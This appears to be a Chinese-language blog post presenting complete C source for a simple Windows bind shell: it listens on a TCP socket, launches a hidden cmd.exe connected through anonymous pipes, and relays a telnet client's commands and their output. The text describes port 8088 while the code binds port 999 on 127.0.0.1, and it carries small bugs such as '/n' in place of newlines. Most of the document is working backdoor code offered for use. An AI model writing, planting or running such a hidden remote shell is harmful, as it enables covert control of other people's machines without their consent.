a一个简单的SHELL

原理就是这个程序在远程机器上运行后，创建一个套接字，监听8088端口，并且将CMD.EXE与两个匿名管道连接起来，然后套接字阻塞等待客户机连接，当我们用TELNET客户端程序连接上远程机器的8088端口后，输入的命令通过套接字recv后保存在一个缓冲区里，然后用WriteFile写到匿名管道里传送给CMD.EXE里，CMD.EXE处理后把结果通过匿名管道写到一个缓冲区，套接字在把这个缓冲区send出去，这样我们就可以接收到远程SHELL的处理结果了

完整代码：

 

#include <stdio.h>
#include <windows.h>
//WS2_32.lib
void main()
{
    WSADATA wsa;
    SOCKET serverFD;
    char Buff[1024];
 ZeroMemory(Buff,1024);
 unsigned long lBytesRead;
    WSAStartup(MAKEWORD(2,2),&wsa);//初始化套接字
    serverFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
struct sockaddr_in server;
int iport;
iport=999;
server.sin_family = AF_INET;
server.sin_port = htons(iport);
    server.sin_addr.s_addr=inet_addr("127.0.0.1");
    int ret=bind(serverFD,(sockaddr *)&server,sizeof(server));
    ret=listen(serverFD,4);
    int iAddrSize = sizeof(server);

re:   
 SOCKET clientFD=accept(serverFD,(sockaddr *)&server,&iAddrSize);

selects:

 char buf2[]="请输入功能：/n 1:cmd/n 2:** /n/n/n/n/n";
 strncpy(Buff, buf2, sizeof(buf2));
  
 ret=send(clientFD,Buff,sizeof(buf2),0); 
   Sleep(200);
   if(ret<=0)
               goto re;
   char *buf1 = "cmd";
   int gethuifu;
       gethuifu=recv(clientFD,Buff,1024,0);
     if(memicmp(buf1,Buff,gethuifu-1)==0)
  {
 printf("cmd 函数功能启动");
 SECURITY_ATTRIBUTES sa;
    sa.nLength=12;
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=true;
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

    ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);    ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

    STARTUPINFO si;
    ZeroMemory(&si,sizeof(si));
    si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = hReadPipe2;
    si.hStdOutput = si.hStdError = hWritePipe1;
    char cmdLine[] = "cmd.exe";
    PROCESS_INFORMATION ProcessInformation;
    ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);

 
    while(1)
    {
        ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
        if(lBytesRead)
        {
            ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
   Sleep(200);
            if(!ret)
                break;
            ret=send(clientFD,Buff,lBytesRead,0); 
   Sleep(200);
   if(ret<=0)
                break;
        }
        else
        {
            lBytesRead=recv(clientFD,Buff,1024,0);//这里接受并取得命令的字节
            if(lBytesRead<=0)
                break;
            ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);//
   Sleep(200);
            send(clientFD,Buff,lBytesRead,0);//这一句就是增加命令回显功能，在标准TELNET里，输入的命令是没有回显的，加了这一句就有了回显功能
            Sleep(200);
   if(!ret) break;
        }
    }

    //goto re;//这一句作用是当客户端断开连接后可以连接

}//判断 功能函数
else
{
 

 printf("cmd 函数功能失败/n请从新选择功能/n %d",gethuifu);
 goto selects;
}
   return;
}